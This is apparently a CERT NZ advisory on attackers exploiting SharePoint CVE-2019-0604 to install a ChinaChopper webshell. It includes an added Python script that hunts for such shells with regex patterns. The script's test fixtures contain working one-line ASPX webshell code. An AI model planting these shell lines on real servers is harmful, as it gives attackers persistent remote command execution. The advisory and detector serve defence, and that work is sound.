Microsoft SharePoint vulnerability being exploited


3:30pm, 13 May 2019

TLP Rating: Clear

Earlier this year researchers published details of a remote code execution vulnerability in Microsoft SharePoint servers. This vulnerability is now being actively exploited to deploy a variant of the ChinaChopper webshell, giving attackers persistent access to affected organisations.

Microsoft has released patches for all vulnerable versions.

What's happening

Systems affected

Microsoft SharePoint vulnerability CVE-2019-0604 is being actively exploited by attackers.

Microsoft released patches for this vulnerability in security updates earlier this year, but any system that remains unpatched is exposed to this attack.

The following SharePoint servers are vulnerable if unpatched:

  • Microsoft SharePoint Enterprise Server 2016
  • Microsoft SharePoint Foundation 2010 Service Pack 2
  • Microsoft SharePoint Foundation 2013 Service Pack 1
  • Microsoft SharePoint Server 2010 Service Pack 2
  • Microsoft SharePoint Server 2013 Service Pack 1
  • Microsoft SharePoint Server 2019

Microsoft’s advisory on CVE-2019-0604 SharePoint remote code execution vulnerability

What this means

Organisations tracking these incidents have noted that attackers exploit the vulnerability on unpatched SharePoint servers and install a version of the ChinaChopper webshell. The webshell gives the attacker ongoing remote command execution on the server, which they can then use to move further into the organisation's network.

What to look for

How to tell if you're affected

The Canadian Centre for Cyber Security has published indicators of compromise for this campaign. Check your SharePoint servers against those indicators, and review web server logs and the SharePoint web root for .aspx files that you did not deploy.

Canadian Centre for Cyber Security’s ChinaChopper malware advisory
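As a starting point for that review, here is an added example (not code from this advisory, from CERT NZ, or from the Canadian Centre) that walks a SharePoint web root such as the TEMPLATE\LAYOUTS directory and scores ASP.NET pages for traits of one-line ChinaChopper-style shells. The sample files it creates are constructed for the demonstration, modelled on the publicly documented classic ChinaChopper ASPX one-liner; the variant seen in this campaign may look different, so run it alongside the published indicators rather than instead of them. Python is used so the logic is easy to read; the same checks can be expressed in PowerShell on the server itself.

```python
"""Hunt for ChinaChopper-style one-line webshells under a SharePoint web root.

Added example, not from the CERT NZ or Canadian advisories. The shell samples
below are constructed from the publicly documented classic ChinaChopper ASPX
form; the variant used against SharePoint in 2019 may differ, so treat this as
a starting point alongside the published indicators, not a complete signature.
"""
import os
import re
import tempfile

# Traits of one-line ASP.NET shells: a JScript page directive (SharePoint's own
# pages are C#), eval of request-controlled data, JScript's "unsafe" eval mode,
# or runtime assembly loading. Each trait present adds one point.
SHELL_PATTERNS = [
    re.compile(r'Language\s*=\s*"Jscript"', re.IGNORECASE),
    re.compile(r'eval\s*\(\s*Request(\.Item)?\s*\[', re.IGNORECASE),
    re.compile(r'eval\s*\([^)]*,\s*"unsafe"\s*\)', re.IGNORECASE),
    re.compile(r'System\.Reflection\.Assembly\.Load', re.IGNORECASE),
]
EXTENSIONS = ('.aspx', '.ashx', '.asmx')


def score_content(content: str) -> int:
    """Number of shell traits present in a page's source."""
    return sum(1 for pattern in SHELL_PATTERNS if pattern.search(content))


def scan_tree(root: str, min_score: int = 2):
    """Return suspicious ASP.NET files under root, highest score first.

    A single trait on its own (for example a legitimate JScript page) is not
    reported, which keeps the output short enough to review by hand.
    """
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding='utf-8', errors='replace') as fh:
                    content = fh.read()
            except OSError:
                continue
            score = score_content(content)
            if score >= min_score:
                hits.append({'path': path, 'score': score,
                             'size': os.path.getsize(path),
                             'mtime': os.path.getmtime(path)})
    hits.sort(key=lambda h: (-h['score'], h['path']))
    return hits


# Constructed sample tree: one legitimate-looking layout page and two shells.
SAMPLE_FILES = {
    'TEMPLATE/LAYOUTS/settings.aspx':
        '<%@ Page Language="C#" Inherits="Microsoft.SharePoint.WebPartPages.WebPartPage" %>\n'
        '<html><body>Site settings</body></html>\n',
    # Classic one-line ChinaChopper ASPX form (constructed sample).
    'TEMPLATE/LAYOUTS/error2.aspx':
        '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>',
    # The same shell split across statements to dodge a naive string match.
    'TEMPLATE/LAYOUTS/help.aspx':
        '<%@ Page Language="Jscript" %>\n<% var p = Request.Item["cmd"]; eval(p, "unsafe"); %>\n',
}


def build_sample_tree() -> str:
    """Write the constructed samples to a temp directory and return its path."""
    root = tempfile.mkdtemp(prefix='sp_hunt_')
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split('/'))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, 'w', encoding='utf-8') as fh:
            fh.write(content)
    return root


if __name__ == '__main__':
    for hit in scan_tree(build_sample_tree()):
        print(f"{hit['score']} traits  {hit['size']:5d} bytes  {hit['path']}")
```

To use it on a real server, call scan_tree() with the path of the 15 or 16 hive's TEMPLATE\LAYOUTS directory (or the whole web root) instead of the sample tree. Treat a hit as a trigger for forensic review rather than proof on its own: compare the file's creation and modification times with your patch and change records, and preserve the file and the corresponding IIS logs before removing anything.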

What to do

Prevention

CERT NZ recommends you patch any Microsoft SharePoint servers that are not up-to-date. Check that the latest cumulative update for your SharePoint version is installed, rather than only the first update that referenced this CVE.

If you are unable to apply these security updates, use other security controls to mitigate the risk, primarily ensuring your SharePoint service is not reachable from the internet. Restricting access only reduces exposure: an attacker who already has a foothold on your internal network can still exploit an unpatched server, so treat this as a stopgap until the update is applied.

More information

Microsoft’s advisory on CVE-2019-0604 SharePoint remote code execution vulnerability

Zero Day Initiative blog from the security researcher

ChinaChopper malware advisory from the Canadian Centre for Cyber Security

If you require more information or further support, submit a report on our website or contact us on 0800 CERTNZ.

Report an incident to CERT NZ

For media enquiries, email our media desk at certmedia@cert.govt.nz or call on 021 854 384